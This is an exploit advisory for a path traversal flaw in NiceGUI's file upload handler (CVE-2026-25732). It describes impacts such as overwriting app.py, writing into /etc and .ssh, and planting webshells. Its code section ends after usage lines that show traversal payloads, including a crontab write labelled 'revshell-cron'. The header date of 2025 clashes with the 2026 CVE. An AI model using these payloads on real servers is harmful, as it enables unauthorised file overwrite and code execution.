**Author:** Mohammed Idrees Banyamer  
**Contact:**  
- Instagram: [@banyamer_security](https://instagram.com/banyamer_security)  
- GitHub: [https://github.com/mbanyamer](https://github.com/mbanyamer)

---

# CVE-2026-25732 — NiceGUI Path Traversal in FileUpload → Arbitrary File Write

**Exploit Title:** NiceGUI Path Traversal in FileUpload Leading to Arbitrary File Write  
**Date:** 2025-06-06  
**Tested on:** NiceGUI ≤ 3.6.1 (Python 3.8 – 3.12 on Linux / Windows)  
**Fixed in:** NiceGUI 3.7.0  
**CVE:** CVE-2026-25732  
**Weakness:** CWE-22 — Improper Limitation of a Pathname to a Restricted Directory  
**Attack Vector:** Network  
**Privileges Required:** None  
**User Interaction:** None  
**Platform:** Web Application (NiceGUI / Python)

## Vulnerability Summary

NiceGUI versions ≤ 3.6.1 do not properly sanitize the `name` field of uploaded files in `ui.upload()` / `FileUpload` handler when the application developer uses the original filename in the save path without additional sanitization.

This allows an unauthenticated attacker to write arbitrary files anywhere the NiceGUI process has write permissions via path traversal sequences (`../`, absolute paths, etc.).

Common impact examples:

- Overwrite `app.py` / `main.py` → code execution on application reload/restart
- Write files to `/etc/`, home directories, `.ssh/`, configuration folders, etc.
- Drop webshells in web-accessible locations (when running behind nginx/Apache)

## Exploit Code

```python
#!/usr/bin/env python3
"""
CVE-2026-25732 — NiceGUI arbitrary file write (path traversal)
Exploits unsanitized FileUpload.name when app uses it in save path.

Usage:
    python exploit_cve_2026_25732.py http://target:8080 "../etc/passwd" payload.txt
    python exploit_cve_2026_25732.py http://target:8080 "../app.py" malicious_app.py
    python exploit_cve_2026_25732.py http://target:8080 "nicegui/../../../etc/crontab" revshell-cron
"""
